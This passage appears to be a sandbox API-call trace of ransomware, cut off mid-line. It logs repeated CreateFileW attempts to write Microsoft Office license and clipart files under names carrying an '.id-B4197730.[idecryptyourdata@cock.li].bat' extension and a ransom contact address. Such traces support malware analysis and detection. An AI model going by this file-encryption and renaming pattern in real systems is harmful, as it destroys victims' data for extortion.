[0160.592] CloseHandle (hObject=0x484) returned 1 [0160.594] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.594] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.594] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SPACE_01.MID.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\space_01.mid.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.594] CloseHandle (hObject=0x484) returned 1 [0160.595] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.595] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.596] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SPRNG_01.MID.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sprng_01.mid.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.596] CloseHandle (hObject=0x484) returned 1 [0160.597] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.597] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.597] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SUMER_01.MID.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sumer_01.mid.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.597] CloseHandle (hObject=0x484) returned 1 [0161.882] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0161.882] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0161.882] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SWEST_01.MID.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\swest_01.mid.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.215] CloseHandle (hObject=0x51c) returned 1 [0163.374] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.374] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.374] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessR_Trial-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessr_trial-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.375] CloseHandle (hObject=0x514) returned 1 [0163.375] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.375] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.376] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Trial2-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_trial2-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.376] CloseHandle (hObject=0x514) returned 1 [0163.377] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.377] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.377] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Trial2-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_trial2-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.377] CloseHandle (hObject=0x514) returned 1 [0163.378] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.378] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.378] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Trial2-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_trial2-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.378] CloseHandle (hObject=0x514) returned 1 [0163.379] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.379] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.379] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentDemoR_BypassTrial180-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentdemor_bypasstrial180-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.380] CloseHandle (hObject=0x514) returned 1 [0163.381] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.381] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.381] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentDemoR_BypassTrial180-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentdemor_bypasstrial180-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.381] CloseHandle (hObject=0x514) returned 1 [0163.382] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.382] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.382] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentDemoR_BypassTrial180-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentdemor_bypasstrial180-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.382] CloseHandle (hObject=0x514) returned 1 [0163.383] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.383] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.383] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_Grace-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_grace-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.384] CloseHandle (hObject=0x514) returned 1 [0163.385] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.385] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.385] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_Grace-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_grace-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.385] CloseHandle (hObject=0x514) returned 1 [0163.386] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.386] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.386] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_OEM_Perp-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_oem_perp-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.386] CloseHandle (hObject=0x514) returned 1 [0163.387] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.387] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.387] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_OEM_Perp-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_oem_perp-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.387] CloseHandle (hObject=0x514) returned 1 [0163.388] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.388] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.388] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_OEM_Perp-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_oem_perp-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.389] CloseHandle (hObject=0x514) returned 1 [0163.390] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.390] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.390] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_OEM_Perp-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_oem_perp-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.390] CloseHandle (hObject=0x514) returned 1 [0163.391] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.391] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.391] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_Retail-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_retail-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.391] CloseHandle (hObject=0x514) returned 1 [0163.392] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.392] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.392] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_Retail-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_retail-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.392] CloseHandle (hObject=0x514) returned 1 [0163.393] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.393] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.393] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_Retail-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_retail-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.394] CloseHandle (hObject=0x514) returned 1 [0163.394] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.394] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.395] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_Retail-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_retail-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.395] CloseHandle (hObject=0x514) returned 1 [0163.396] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.396] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.396] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_Trial-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_trial-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.396] CloseHandle (hObject=0x514) returned 1 [0163.397] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.397] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.397] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_Trial-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_trial-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.398] CloseHandle (hObject=0x514) returned 1 [0163.399] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.399] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.399] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_Trial-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_trial-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.399] CloseHandle (hObject=0x514) returned 1 [0163.400] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.400] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.400] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_Trial2-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_trial2-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.400] CloseHandle (hObject=0x514) returned 1 [0163.401] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.401] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.401] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_Trial2-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_trial2-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.402] CloseHandle (hObject=0x514) returned 1 [0163.402] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.403] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.403] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_Trial2-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_trial2-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.403] CloseHandle (hObject=0x514) returned 1 [0163.407] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.407] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.407] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_BypassTrial180-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_bypasstrial180-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.408] CloseHandle (hObject=0x514) returned 1 [0163.410] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.410] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.410] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_BypassTrial180-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_bypasstrial180-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.411] CloseHandle (hObject=0x514) returned 1 [0163.664] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.664] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.664] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_BypassTrial180-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_bypasstrial180-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.667] CloseHandle (hObject=0x50c) returned 1 [0163.669] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.670] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.670] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTest2-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtest2-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.672] CloseHandle (hObject=0x50c) returned 1 [0163.676] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.676] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 